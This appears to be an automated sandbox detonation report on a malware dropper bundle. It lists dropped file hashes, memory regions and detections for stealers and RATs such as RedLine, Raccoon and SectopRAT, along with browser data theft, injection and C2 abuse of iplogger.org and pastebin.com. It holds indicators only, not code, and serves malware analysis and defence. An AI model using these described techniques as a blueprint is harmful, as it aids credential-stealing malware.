C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
memory/1840-122-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/1424-143-0x0000000000220000-0x0000000000290000-memory.dmp
memory/1840-148-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1728-153-0x00000000002E0000-0x00000000002E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1644-149-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1848-147-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2116-166-0x00000000003D0000-0x00000000003D8000-memory.dmp
memory/2632-181-0x00000000009F0000-0x0000000000B4D000-memory.dmp
memory/1728-142-0x0000000000380000-0x0000000000396000-memory.dmp
memory/1536-141-0x00000000013D0000-0x0000000001440000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJXEGA87TDX8247FU3MX.temp
| MD5 | 794da3a27b3d340793e14266f6d479f8 |
| SHA1 | 5ad8b9c2a2dc1614975fabe72b965843004c1a35 |
| SHA256 | a2dfdb16600066aab5ff67f4cff16c1c237f40e85a061cad7c749246c3624a28 |
| SHA512 | 90679ec1677bc360f1ff6ce66d3c66102fa3c0141e6ec1a7968e2a6040a858194838462f73a3d31d78b3298e323107a801b61c70136cd0db3916f5620573a813 |
memory/2804-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2804-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2804-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2804-61-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/300-191-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-182-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-194-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2632-195-0x0000000002A00000-0x0000000002AA7000-memory.dmp
memory/300-192-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2632-197-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-199-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-196-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/300-188-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-186-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-184-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2804-208-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2804-207-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-206-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2804-204-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2804-201-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2804-200-0x0000000000400000-0x000000000051C000-memory.dmp
memory/980-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/980-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1644-223-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1612-224-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2876-222-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/980-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2632-226-0x00000000009F0000-0x0000000000B4D000-memory.dmp
memory/2632-233-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-235-0x0000000000800000-0x000000000088D000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4956 set thread context of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe |
| PID 2480 set thread context of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe |
| PID 4840 set thread context of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331646796819" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
